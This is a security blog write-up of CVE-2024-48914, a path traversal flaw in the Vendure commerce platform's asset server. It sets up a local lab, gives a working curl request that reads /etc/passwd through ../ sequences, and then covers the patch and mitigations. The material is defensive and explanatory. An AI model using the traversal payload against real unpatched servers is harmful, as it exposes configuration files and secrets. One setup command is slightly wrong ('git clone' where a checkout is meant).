Ethical Hacking

Videos

CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure

2024-10-26
Kamran Hasan
CVE-2024-48914
CVE-2024-48914 exploit
CVE-2024-48914 file read vulnerability
Vendure vulnerability
Vendure file read vulnerability
Vendure arbitrary file read
Vendure security patch
Vendure asset server vulnerability
Vendure file path traversal
Arbitrary File Read
CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure

Introduction

CVE-2024-48914 is a critical security vulnerability that affects older versions of Vendure, an open-source headless commerce platform. This vulnerability allows attackers to exploit a flaw in the asset server plugin to read arbitrary files on the server. This could lead to the exposure of sensitive information such as configuration files, source code, and other critical data.

Understanding the Vulnerability

The vulnerability arises from a lack of proper input validation and sanitization in the asset server plugin. Attackers can craft malicious requests that exploit this flaw to traverse the server's file system and access arbitrary files.

Key Vulnerability Details:

  • Vulnerable Component: Asset server plugin

  • Attack Vector: Malicious HTTP requests

  • Impact: Arbitrary file reading, potential data exposure

  • Affected Versions: Vendure versions prior to 3.0.5 and 2.3.3

Technical Breakdown

  • Malicious Request Construction:

    • An attacker can construct a malicious HTTP request targeting the asset server endpoint.

    • By carefully crafting the request URL, the attacker can manipulate the file path to access files outside the intended directory.

    • This can be achieved by using directory traversal techniques, such as ../ sequences, to move up the directory hierarchy.

  • Server-Side File Reading:

    • The server, without proper validation, processes the malicious request and attempts to read the specified file.

    • The file contents are then returned to the attacker in the response.

Exploitation Scenarios

  • Data Exfiltration:

    • Attackers can access and download sensitive configuration files, source code, or other confidential data.

    • This information can be used to gain deeper insights into the system's vulnerabilities or to launch further attacks.

  • System Compromise:

    • By reading system files, attackers can gain information about the server's configuration, installed software, and security measures.

    • This knowledge can be used to identify potential attack vectors or to compromise the system in other ways.

Proof of Concept

Building a lab for CVE-2024-48914 will require us to host Vendure's vulnerable version in our local environment that we can use as a potential target for our exploit.

Installing Vendure app is a multi step procedure. At first, we will clone the Vendure from their offical github repository:

git clone https://github.com/vendure-ecommerce/vendure/
cd vendure/

But we are are interested in the vulnerable version, so we will checkout to v3.0.4

git clone v3.0.4

Now we will install the top level dependencies and build all packages:

npm install
npm run build

The next step involve setting up databases, we can use the following docker compose to host them:

version: '3.7'
name: vendure-monorepo
services:
  mariadb:
    image: 'bitnami/mariadb:latest'
    container_name: mariadb
    environment:
      MARIADB_DATABASE: vendure-dev
      MARIADB_ROOT_USER: vendure
      MARIADB_ROOT_PASSWORD: password
    volumes:
      - 'mariadb_data:/bitnami'
    ports:
      - '3306:3306'
   elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.10.2
    container_name: elasticsearch
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - esdata:/usr/share/elasticsearch/data
    ports:
      - 9200:9200
  redis:
    image: bitnami/redis:7.4.1
    hostname: redis
    container_name: redis
    environment:
      - ALLOW_EMPTY_PASSWORD=yes
    ports:
      - "6379:6379"
volumes:
  mariadb_data:
    driver: local
  esdata:
    driver: local

Now lets make these up and running:

docker compose up --build

We can update the dev server's config file with the database connection details. The config file is located at: vendure/packages/dev-server/dev-config.ts

My updated dev config looks like this (where the host value is my docker container's IP running MariaDB server):

Now we are all set to start Venture's dev server:

npm run populate
npm run dev

That's all we had to do to set up the vulnerable target for this CVE-2024-48914. Let's discuss the exploitation now.

To read arbitrary file on the system hosting this vulnerable target, we will simply use path traversal technique on /assets/ endpoint. The CURL would look like this if we would like to read the /etc/passwd file (the traversal will start from the vendure/packages/dev-server/assets/ directory):

curl -s --path-as-is "localhost:3000/assets/../../../../../../../etc/passwd"

Patch Details

In the patch commit, they have fixed this vulnerability by adding a method to sanitize file paths.

  • The path.normalize method standardizes the path format by resolving sequences like /../ and /./, turning them into a canonical form. For example, path.normalize("/folder/../file") will simplify to /file.

  • This removes redundant parts of the path and helps detect path traversal attempts, like repeated ../.

Mitigation Strategies

  • Update Vendure: 

    • Install the latest security patch released by Vendure (versions 3.0.5 and 2.3.3 or later) to address the vulnerability. This patch includes necessary fixes to prevent arbitrary file read attacks.

  • Workarounds:

    • Object Storage: Consider using object storage solutions like MinIO or S3 to store assets, reducing the risk of file system traversal attacks.

    • Middleware: Implement custom middleware to detect and block requests with malicious file paths, such as those containing ../ sequences.

Security Best Practices:

  • Regularly update all software components to address known vulnerabilities.

  • Implement strong password policies and enforce multi-factor authentication.

  • Regularly review and update security configurations.

  • Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.

Conclusion

CVE-2024-48914 highlights the importance of keeping software up-to-date and following security best practices. By promptly updating Vendure to the latest version or implementing the recommended workarounds, organizations can mitigate the risk of this vulnerability and protect their e-commerce platforms.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2024-48914 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.

CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
2024-05-26
James McGill
CVE-2021-43798: Path Traversal in Grafana
CVE-2021-43798: Path Traversal in Grafana
2024-03-30
James McGill
CVE-2021-3129: Remote Code Execution in Laravel
CVE-2021-3129: Remote Code Execution in Laravel
2024-02-14
James McGill
CVE-2024-28116: Server-Side Template Injection in Grav CMS
CVE-2024-28116: Server-Side Template Injection in Grav CMS
2024-03-24
James McGill
CVE-2022-42889: Remote Code Execution in Apache Commons Text
CVE-2022-42889: Remote Code Execution in Apache Commons Text
2024-01-13
James McGill
CVE-2023-33246: Remote Code Execution in Apache RocketMQ
CVE-2023-33246: Remote Code Execution in Apache RocketMQ
July 23, 2023
Muhammad Kamran Hasan